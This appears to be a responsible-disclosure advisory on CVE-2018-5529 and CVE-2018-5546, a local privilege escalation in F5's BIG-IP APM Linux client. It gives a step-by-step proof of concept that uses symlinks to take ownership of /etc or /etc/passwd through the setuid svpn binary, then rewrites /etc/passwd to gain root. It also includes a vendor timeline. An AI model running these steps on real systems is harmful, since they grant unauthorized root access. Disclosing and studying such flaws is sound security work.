Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
252 lines (179 sloc) 9.24 KB
Title: F5 BIG-IP APM client for Linux and macOS vulnerability
Author: Rich Mirch
CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546
Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)
Description
The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package
changes the ownership and permissions of several files and directories
under $HOME/.F5Networks which allows local unprivileged users to obtain
ownership of arbitrary files via vectors involving creation of a directory
and a file under that directory, and later replacing that directory or
file with a symlink.
Notes:
1. PoC provided for Linux however macOS is also vulnerable. The svpn binary
is named differently and stored in a different directory on macOS.
2. The policyserver component is also vulnerable to a similar attack against
the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base: 7.8
Temporal: 7.0
Test Environment
OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO: apmclients-7160.2018.118.2335-4172.0.iso
Proof Of Concept
Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary which is setuid root.
1. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks directory.
2. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks/svpn.log file.
Note: A low privileged account named user1 is used for all test cases.
[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-
s0:c0.c1023
################################################################################
# Test case 1 - take ownership of a directory
# /etc via $HOME/.F5Networks
################################################################################
[Step 1] Create a symlink from /etc to $HOME/.F5Networks
[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc
lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc
[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[Step 3] Show that user1 is now the owner of /etc.
[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc
[Step 4] Modify /etc/passwd and change UID/GID to 0 for user1.
[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd
[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash
[Step 5] Execute /bin/su - user1 and become root.
[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 2 - take ownership of a file
# /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################
[Step 1] Create $HOME/.F5Networks.
[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks
[Step 2] Display permissions of /etc/passwd and attempt to write to it.
[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$
[Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log.
[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd
[Step 4] Backup /etc/passwd.
[user1@localhost ~]$ cp -p /etc/passwd passwd.orig
[Step 5] Display contents of /etc/passwd.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd
[Step 7] Display contents of /etc/passwd. Notice the log file is appended to the file.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed
out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed
[Step 8] Create a new /etc/passwd file and change UID and GID to 0.
[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd
[Step 9] Execute /bin/su - user1 and become root.
[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#
Timeline:
2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546
You can’t perform that action at this time.